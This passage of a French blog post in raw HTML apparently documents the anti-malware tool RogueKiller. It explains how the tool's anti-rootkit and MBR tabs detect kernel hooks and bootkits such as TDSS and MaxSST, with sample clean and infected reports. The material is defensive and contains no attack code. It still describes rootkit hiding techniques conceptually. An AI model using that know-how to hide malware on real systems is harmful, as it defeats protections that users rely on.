&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;- &lt;b&gt;&lt;a href="http://fr.wikipedia.org/wiki/System_Service_Dispatch_Table"&gt;System Service Dispatch Table&lt;/a&gt;&lt;/b&gt; (SSDT)&amp;nbsp; &lt;span style="font-size: small;"&gt;- Montre les &lt;span style="font-size: small;"&gt;&lt;a href="http://fr.wikipedia.org/wiki/Interface_de_programmation"&gt;APIs&lt;/a&gt; &lt;span style="font-size: small;"&gt;détournées.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;- &lt;b&gt;Shadow SSDT&lt;/b&gt; (S_SSDT) - Montre les APIs détournées&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;- &lt;b&gt;Inline SSDT&lt;/b&gt; - Montre les APIs détournées par hot patching.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;- &lt;b&gt;&lt;a href="http://en.wikipedia.org/wiki/I/O_request_packets"&gt;IRP&lt;/a&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; hook&lt;/b&gt; - &lt;span style="font-size: small;"&gt;Montre les drive&lt;span style="font-size: small;"&gt;rs dont les fonctions majeures sont détournées&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Il &lt;span style="font-size: small;"&gt;est possible de &lt;b&gt;désactiver le scan anti-rootkit&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; avant d'&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;effectuer le scan&lt;/b&gt; en décochant la case &lt;span style="font-size: small;"&gt;&lt;i&gt;&lt;b&gt;Anti&lt;span style="font-size: small;"&gt;R&lt;/span&gt;ootkit&lt;/b&gt;&lt;/i&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://4.bp.blogspot.com/-9YgmPPu3vyU/UJPZnC6rokI/AAAAAAAAARc/0_PaV5A5cDw/s1600/Capture3.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="482" src="http://4.bp.blogspot.com/-9YgmPPu3vyU/UJPZnC6rokI/AAAAAAAAARc/0_PaV5A5cDw/s640/Capture3.PNG" width="640" /&gt;&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
Il est possible de &lt;b&gt;restaurer certains détournements (SSDT et Inline SSDT) par un clic droit, &lt;i&gt;restaurer&lt;/i&gt;&lt;/b&gt;. Si le détournement est légitime (en effet, la plupart des antivirus utilisent ces techniques pour fonctionner) il ne sera pas possible de le restaurer. RogueKiller fonctionne sur une base de liste blanche de drivers, mais il est possible que certains détournements ne soient pas listés (Si c'est le cas, merci de le signaler).&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-9YgmPPu3vyU/UJPZnC6rokI/AAAAAAAAARc/0_PaV5A5cDw/s1600/Capture3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-klZLj-6-nRE/UJPZmUSjFVI/AAAAAAAAARY/TcyjH3dbSww/s1600/Capture2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="248" src="http://3.bp.blogspot.com/-klZLj-6-nRE/UJPZmUSjFVI/AAAAAAAAARY/TcyjH3dbSww/s640/Capture2.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Les détournement du noyau (illégitimes ou suspects) sont listés également à l'édition du rapport, dans la section &lt;i&gt;&lt;b&gt;Driver&lt;/b&gt;&lt;/i&gt;. on y retrouve le nom de l'API, l'adresse et le nom du driver détournant cette dernière.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;table border="1" cellpadding="5" cellspacing="1" style="margin-left: auto; margin-right: auto; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;¤¤¤ Driver : [CHARGE] ¤¤¤
&lt;br /&gt;SSDT[119] : NtOpenKey @ 0x80624BA6 -&amp;gt; HOOKED (\??\C:\WINDOWS\TEMP\rqmqbqga.&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="color: #0b5394;"&gt;sys @ 0xF783E562)&lt;br /&gt;SSDT[57] : NtDebugActiveProcess @ 0x80643B3E -&amp;gt; HOOKED (Unknown @ 0x89C30200)
&lt;br /&gt;SSDT[68] : NtDuplicateObject @ 0x805BE010 -&amp;gt; HOOKED (Unknown @ 0x89C302F0)
&lt;br /&gt;SSDT[277] : NtWriteVirtualMemory @ 0x805B43D4 -&amp;gt; HOOKED (Unknown @ 0x89C306D0)
&lt;br /&gt;IRP[IRP_MJ_CREATE] : Unknown -&amp;gt; HOOKED ([MAJOR] atapi.sys @ 0xB7DF3B40)
&lt;br /&gt;IRP[IRP_MJ_CLOSE] : Unknown -&amp;gt; HOOKED ([MAJOR] atapi.sys @ 0xB7DF3B40)
&lt;br /&gt;IRP[DriverStartIo] : Unknown -&amp;gt; HOOKED ([MAJOR] atapi.sys @ 0xB7DF1864)
&lt;/span&gt; 
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: #741b47;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&lt;span style="font-size: large;"&gt;O&lt;span style="font-size: large;"&gt;NGLET MBR&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;L&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;'onglet &lt;i&gt;&lt;b&gt;MBR &lt;/b&gt;&lt;/i&gt;&lt;span style="font-size: small;"&gt;liste et affiche les informations concernant le(s) &lt;a href="http://fr.wikipedia.org/wiki/Master_boot_record"&gt;Master Boot Reco&lt;/a&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://fr.wikipedia.org/wiki/Master_boot_record"&gt;rd&lt;/a&gt; (MBR) du PC. Ce dernier est le premier secteur physique d'un disque dur, c&lt;span style="font-size: small;"&gt;ontenant à la fois des &lt;b&gt;informations sur la taille e&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;t la localisation des différentes partitions logiques&lt;/b&gt;, ainsi&lt;span style="font-size: small;"&gt; que l&lt;b&gt;e code chargé de lancer le système d'exploitation&lt;/b&gt;&lt;span style="font-size: small;"&gt; d'un disque bootable.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Certains malwares &lt;span style="font-size: small;"&gt;appelés&lt;/span&gt; &lt;i&gt;&lt;b&gt;Bootkit&lt;/b&gt;&lt;/i&gt;, comme &lt;a href="http://en.wikipedia.org/wiki/Alureon"&gt;TDSS&lt;/a&gt;, Max&lt;span style="font-size: small;"&gt;SST&lt;span style="font-size: small;"&gt; ou&lt;span style="font-size: small;"&gt; &lt;a href="http://korben.info/stoned-bootkit-le-premier-bootkit-open-source-qui-va-faire-mal.html"&gt;Stoned&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; modifient soit le code (bootstrap)&lt;span style="font-size: small;"&gt; pour lance&lt;span style="font-size: small;"&gt;r leurs propres composants, &lt;span style="font-size: small;"&gt;soit la table des partitions pour booter sur une partition fantôme et ainsi &lt;span style="font-size: small;"&gt;effectuer des traitement&lt;span style="font-size: small;"&gt;s avant le lancement d&lt;span style="font-size: small;"&gt;u systè&lt;span style="font-size: small;"&gt;me d'e&lt;span style="font-size: small;"&gt;xploi&lt;span style="font-size: small;"&gt;tation (et des antivirus&lt;span style="font-size: small;"&gt;!). &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;RogueKiller permet de détecter et supprimer les&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; &lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;bootkits&lt;/b&gt;&lt;span style="font-size: small;"&gt;, même lorsqu'ils masquent leur présence.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Plusieurs indicateurs montrent la légitimité d'un MBR&lt;span style="font-size: small;"&gt;: Le boot&lt;span style="font-size: small;"&gt;strap est connu, et légitime&lt;span style="font-size: small;"&gt;.&lt;span style="font-size: small;"&gt; &lt;span style="font-size: small;"&gt;Ensuite, la lecture à différents niveaux &lt;span style="font-size: small;"&gt;d’abstraction&lt;/span&gt; retourne les même résultat&lt;span style="font-size: small;"&gt;s (ce qui signifie que le MBR n'est pas masqué).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Voici un exemple de rapport&lt;span style="font-size: small;"&gt; sain&lt;span style="font-size: small;"&gt;. Le boots&lt;span style="font-size: small;"&gt;rap (BSP) est légitime (Windows XP), et la lecture &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;User, LL1 et LL2 renvoi&lt;span style="font-size: small;"&gt;ent les mêmes résultats.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: center;"&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;table border="1" cellpadding="5" cellspacing="1" style="margin-left: auto; margin-right: auto; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;¤¤¤ MBR Verif: ¤¤¤&lt;br /&gt;&lt;br /&gt;+++++ PhysicalDrive0: VBOX HARDDISK +++++&lt;br /&gt;--- User ---&lt;br /&gt;[MBR] c708b764ca9daa4f8f33e4e8b3b517da&lt;br /&gt;[BSP] f4eb87199eee8a432bb482bb55118447 : &lt;b&gt;&lt;span style="color: #741b47;"&gt;Windows XP MBR Code&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;Partition table:&lt;br /&gt;0 - [ACTIVE] NTFS (0x07) [VISIBLE] Offset (sectors): 63 | Size: 4086 Mo&lt;br /&gt;&lt;b&gt;&lt;span style="color: #741b47;"&gt;User = LL1 ... OK!&lt;br /&gt;User = LL2 ... OK!&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="color: #0b5394;"&gt;&lt;/span&gt; 
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Voici un exemple de rapport&lt;span style="font-size: small;"&gt; présen&lt;span style="font-size: small;"&gt;tant un MBR infecté. Le boots&lt;span style="font-size: small;"&gt;rap (BSP) est légitime (Windows &lt;span style="font-size: small;"&gt;7&lt;/span&gt;), mais la méthode LL1 renvoit&lt;span style="font-size: small;"&gt; quelque chose de différent.&lt;span style="font-size: small;"&gt; Enfin et surtout, &lt;span style="font-size: small;"&gt;il existe une partit&lt;span style="font-size: small;"&gt;ion fantôme masqué par le &lt;span style="font-size: small;"&gt;rootkit (MaxSST).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: center;"&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;table border="1" cellpadding="5" cellspacing="1" style="margin-left: auto; margin-right: auto; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;¤¤¤ MBR Verif: ¤¤¤&lt;br /&gt;&lt;br /&gt;+++++ PhysicalDrive0: Hitachi HDS721032CLA362 +++++&lt;br /&gt;--- User ---&lt;br /&gt;[MBR] a1e2c1a0c1fb3db806dcbb65fdbf8384&lt;br /&gt;[BSP] 0dc0d942fc9152dc059c7e021d2ad3db : Windows 7 MBR Code&lt;br /&gt;Partition table:&lt;br /&gt;0 - [ACTIVE] NTFS (0x07) [VISIBLE] Offset (sectors): 2048 | Size: 100 Mo&lt;br /&gt;1 - [XXXXXX] NTFS (0x07) [VISIBLE] Offset (sectors): 206848 | Size: 305129 Mo&lt;br /&gt;&lt;b&gt;&lt;span style="color: #cc0000;"&gt;User != LL1 ... KO!&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;--- LL1 ---&lt;br /&gt;[MBR] 501fcd9f60449033a7b892d424337896&lt;br /&gt;[BSP] 0dc0d942fc9152dc059c7e021d2ad3db : &lt;span style="color: #cc0000;"&gt;Windows 7 MBR Code &lt;b&gt;[possible maxSST in 2!]&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;Partition table:&lt;br /&gt;0 - [XXXXXX] NTFS (0x07) [VISIBLE] Offset (sectors): 2048 | Size: 100 Mo&lt;br /&gt;1 - [XXXXXX] NTFS (0x07) [VISIBLE] Offset (sectors): 206848 | Size: 305129 Mo&lt;br /&gt;&lt;b&gt;&lt;span style="color: #cc0000;"&gt;2 - [ACTIVE] NTFS (0x17) [HIDDEN!] Offset (sectors): 625113088 | Size: 10 Mo&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style="color: #741b47;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt; 
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;ul&gt;
